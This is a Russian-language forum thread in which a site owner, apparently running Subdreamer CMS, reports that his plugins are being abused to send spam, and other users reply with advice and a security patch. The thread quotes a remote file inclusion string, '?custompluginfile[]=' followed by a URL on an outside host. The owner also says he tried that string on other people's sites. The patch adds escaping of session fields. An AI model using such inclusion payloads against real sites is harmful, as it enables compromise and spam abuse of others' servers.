Обнаружена уязвимость.

Статус
В этой теме нельзя размещать новые ответы.

golodenko

Создатель
Регистрация
13 Май 2009
Сообщения
12
Реакции
1
Суть в чем:
Кто-то каким-то образом использует возможность присоединять текст из постороннего источник к плагинам.

//?custompluginfile[]=http://www.campus.it/media/Shaun$.txt

И рассылает спам.
Я попробовал эту строку добавить на несколько других сайтов — там не было результата. А на моем появляется форма отправки сообщения.

В чем может быть проблема? Спасите.

Простите за ламерскую формулировку.
 
Я попробовал эту строку добавить на несколько других сайтов
ггггг...
В чем может быть проблема?
странно, последняя уязвимость была ещё ого-го когда....
не уверен -- но может права на папки\файлы у вас установлены слишком вольготные?...
 

Я же извинился :))

странно, последняя уязвимость была ещё ого-го когда....
не уверен -- но может права на папки\файлы у вас установлены слишком вольготные?...

Проверю.

Смотрите я что думаю. При создании плагина есть пункт "из файла". Этот пункт видимо предусматривает ссылку на удаленный файл. Как можно отключить эту строку? Или запретить доступ к удаленным файлам для плагинов?
 
как накаркали...

рекомендовано обновиться до версии: Subdreamer CMS Pro 2.5.3.3
необходимо обновить два файла:
1. includes/usersystems/phpbb3.php
2. includes/usersystems/ipb2.php
для PHPBB3, строка 701 of includes/usersystems/phpbb3.php:
PHP:
$session['session_ip'], $session['session_browser'], $session['session_page'], $session['session_viewonline'],
заменить на:
PHP:
$session['session_ip'], $DB->escape_string($session['session_browser']), $session['session_page'], $session['session_viewonline'],
для IPB2, строка 215 in includes/usersystems/ipb2.php:
PHP:
$DB->escape_string($session['ip_address']), $session['browser'],
заменить на:
PHP:
$DB->escape_string($session['ip_address']), $DB->escape_string($session['browser']),
 
Статус
В этой теме нельзя размещать новые ответы.
Назад
Сверху